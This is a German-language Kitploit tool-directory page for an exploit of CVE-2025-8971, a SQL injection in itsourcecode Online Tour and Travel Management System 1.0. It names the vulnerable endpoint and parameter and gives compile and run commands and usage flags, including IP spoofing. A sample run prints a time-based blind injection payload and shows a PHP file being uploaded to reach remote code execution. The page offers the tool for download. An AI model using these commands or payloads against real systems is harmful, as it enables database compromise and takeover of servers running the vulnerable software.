Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8971 — SQL-Injection in itsourcecode Online Tour and Travel Management System 1.0. | Kitploit
Tools/GitHubGitHub/bytereaper77/cve-2025-8971
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsArchived
GitHubbytereaper77/cve-2025-8971

CVE-2025-8971

SQL-Injection in itsourcecode Online Tour and Travel Management System 1.0.

Repository anzeigen
12vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-8971 (SQL-Injektion)

Autor: Byte Reaper

Beschreibung:

Dieser Exploit für CVE-2025-8971 nutzt eine SQL-Injektions-Schwachstelle in itsourcecode Online Tour and Travel Management System 1.0 aus. Die Schwachstelle befindet sich in /admin/operations/travellers.php und kann remote über den Parameter val-username ausgenutzt werden.

So funktioniert es

Der Exploit sendet manipulierte HTTP-POST-Anfragen an die Ziel-URL.

Payloads werden kodiert und in val-username injiziert.

Optional kann ein Dateiupload (.php oder Bild) verwendet werden, um eine Remote-Codeausführung zu erreichen.

Das Skript überprüft die Antworten, um festzustellen, ob der Payload erfolgreich ausgeführt wurde.

Voraussetzungen:

root@kitploit:~
GCC Compiler (gcc)

Linux x86_64

ibcurl

Kompilierung:

root@kitploit:~
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<ziel> -v [ausführlicher Modus]

Verwendung:

root@kitploit:~
    -h, --help            Hilfemeldung
    -u, --url             Ziel-URL (BASE-URL)
    -c, --cookies         Cookie-Datei
    -i, --ip              Gefälschte IP (Host-Anfrage)
    -f, --file            Dateiupload (.php / Bild)
    -v, --verbose         Ausführlicher Modus

Beispielausführung:

root@kitploit:~
[+] Starte Kodierung des Payloads in der Anfrage (username=)
[+] Kodierter Payload: AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Ursprünglicher Payload (unkodiert): AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST-Anfrage gesendet
[+] Vollständige URL: http://127.0.0.1/code/admin/operations/travellers.php
[+] Dateiupload: test.php
[+] Datei erfolgreich geschrieben
....

Lizenz:

MIT License

Tool herunterladen